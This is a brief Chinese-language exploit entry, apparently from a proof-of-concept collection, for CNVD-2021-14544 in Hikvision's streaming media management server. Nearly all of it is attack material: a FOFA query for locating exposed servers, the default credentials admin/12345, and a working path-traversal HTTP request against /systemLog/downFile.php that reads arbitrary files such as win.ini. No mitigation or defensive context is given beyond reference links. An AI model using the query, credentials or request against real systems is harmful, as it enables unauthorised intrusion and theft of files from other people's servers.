海康威视 流媒体管理服务器任意文件读取/通用弱口令 CNVD-2021-14544
杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。
FOFA:
title="流媒体管理服务器"
默认口令:admin/12345
PoC:
GET /systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host:
ref:
- https://forum.ywhack.com/thread-115314-1-8.html
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-14544